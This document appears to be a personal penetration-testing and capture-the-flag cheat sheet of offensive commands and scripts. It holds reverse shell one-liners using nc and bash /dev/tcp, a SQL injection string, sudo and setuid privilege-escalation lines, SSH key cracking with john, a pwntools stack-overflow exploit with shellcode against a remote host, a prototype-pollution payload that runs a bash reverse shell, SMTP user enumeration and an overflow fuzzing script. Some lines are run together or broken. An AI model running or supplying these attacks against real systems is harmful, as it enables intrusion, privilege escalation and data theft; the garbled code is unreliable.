nmap -sC -A -T4 <ip>ffuf -u http://<url>/FUZZ -w /usr/share/wordlists/dirb/common.txtffuf -u http://<url> -w /usr/share/dnsrecon/subdomains-top1mil.txt -H "Host: FUZZ.<domain>.com" -fc 301gobuster dir -u http://<url> -w /usr/share/wordlists/dirb/common.txtnikto -host <ip>dirb <url> /usr/share/wordlists/dirb/common.txtpip install git-dumper
git-dumper https://some-url/.git ./meow
ls ./meow
wget -S some://url
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.198.73.23", 23))
print s.recv(1024)for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done
Listener
nc -nlvp 444
Client
/bin/sh | nc <ip> 444
# or
bash -c "bash -i >& /dev/tcp/127.0.0.1/444 0>&1"
import os
os.system("/bin/bash")
' OR name='test';--
sudo -l
sudo -u theuser <app>
sudo --preserve-env=PATH /some/thing
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
arp -a # arp cache
cat /etc/hosts # look at hosts file
cat /etc/resolv.conf # linux local dns
nmcli dev show #
ipconfig /all # local dns on windows
/usr/share/john/ssh2john.py id_rsa > id_rsa_hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Use ghidra to reverse the code to C
file some-executable
checksec --file=some-executable
strace ./some-executable
rtrace ./some-executable
gdb some-executable
(gdb) info break
(gdb) info registers
(gdb) disassemble <fn-name>
(gdb) break *0x000055555555539c
(gdb) run
(gdb) stepi
(gdb) continue
# stripped workflow
(gdb) run
(gdb) info file # look for entry point
(gdb) break *0x555555555080
(gdb) run
(gdb) x/1000i $rip # list 1k lines from instruction pointer
(gdb) x/1000i 0x5555555558dd # list 1k lines from address
(gdb) x/20wx $esp # view 20 words starting from esp
(gdb) delete 1 # delete breakpoint
(gdb) delete # delete all breakpoints
// time_t time(time_t *second) returns epoch in seconds
time_t tVar;
tVar = time((time_t *)0x0); // argument is NULL
void srand(unsigned int seed) // sets a seed for rand() to use
int rand(void)
RBP: bottom of the current stack frame
RAX: 64bit version of EAX(32bit), and AX(16bit)
LEA accepts a standard memory addressing operand, but does nothing more than store the calculated memory offset in the specified register, which may be any general purpose register.
MOV dest_reg source_reg
MOV eax, 0x0
from pwn import *
def main():
context.log_level = 'DEBUG'
context(os='linux', arch='amd64')
# io = process('./binary_file')
io = remote('x.x.x.x', 30774)
password = 'w00tw00t'
return_address_offset = 84
max_payload_length = 137
io.sendlineafter('> ', b'1')
stack_address = io.recvline().strip().split()[-1]
stack_address = ''.join([chr(int(stack_address[i:i+2], 16)) for i in range(2, len(stack_address), 2)])
stack_address = stack_address.rjust(8, '\x00')
stack_address = u64(stack_address, endian="big")
log.success(f'Leaked stack address: {p64(stack_address)}')
io.sendlineafter('> ', b'2')
io.sendlineafter('password: ', password.encode())
shellcode = asm(
shellcraft.popad() +
shellcraft.sh()
)
padding = b'a' * (return_address_offset - len(shellcode))
payload = shellcode + padding + p64(stack_address)
assert len(payload) <= max_payload_length, f'Payload too big. "{len(payload)}"'
io.sendlineafter('commands: ', payload)
io.sendlineafter('> ', b'3')
io.interactive()
if __name__ == '__main__':
main()from pwn import *
pattern = cyclic(100) # 100 bytes long
offset = cyclic_find('vaaa')PATH=$PATH:/some/path
ssh -i some_id_rsa <usr>@<ip>
msfconsole
search <name>
use <id>
show options
set rhosts <ip>
set targeturi /cgi-bin/hello.cgi
runWill serve any file in directory
python -m SimpleHTTPServer 8000 # if python2
python -m http.serverTo fetch from the remote machine
wget http://<ip>:8000/LinEnum.shwget -r --level=1 -p http://<website>
find . -name "*" -exec cat {} \; | grep "@email.com" # find strings in downloaded sitesimport requests
TARGET_URL = 'http://10.10.12.14:8713'
r1 = requests.post(TARGET_URL + '/submit', json = {
"__proto__.type": "Program",
"__proto__.body": [{
"type": "MustacheStatement",
"path": 0,
"params": [{
"type": "NumberLiteral",
"value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/10.10.12.14/6666 0>&1'`)"
}],
"loc": {
"start": 0,
"end": 0
}
}]
})
print(r1._content)
r2 = requests.post(TARGET_URL + '/submit', json = {
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync(`cat flag* >> ./static/file.txt`)"
}
})
print(r2._content)import socket
f = open("userlist", "r")
users = f.readlines()
for user in users:
s = socket.socket(socket.AFINTE)
s.connect(("mail.baldrinc.com", 25))
s.recv(1024)
s.send("HELO")
#...
# 546d467562334a356558493dimport socket
import time
def exploit(ip, port, x):
payload = b"A" * x
payload += b"\xb3\xba\x37\x13"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
time.sleep(0.3)
s.sendall(payload + b"\n")
print(s.recv(2048).decode(errors="ignore"))
s.close()
for i in range(44, 80):
exploit("x.x.x.x", 8080, i)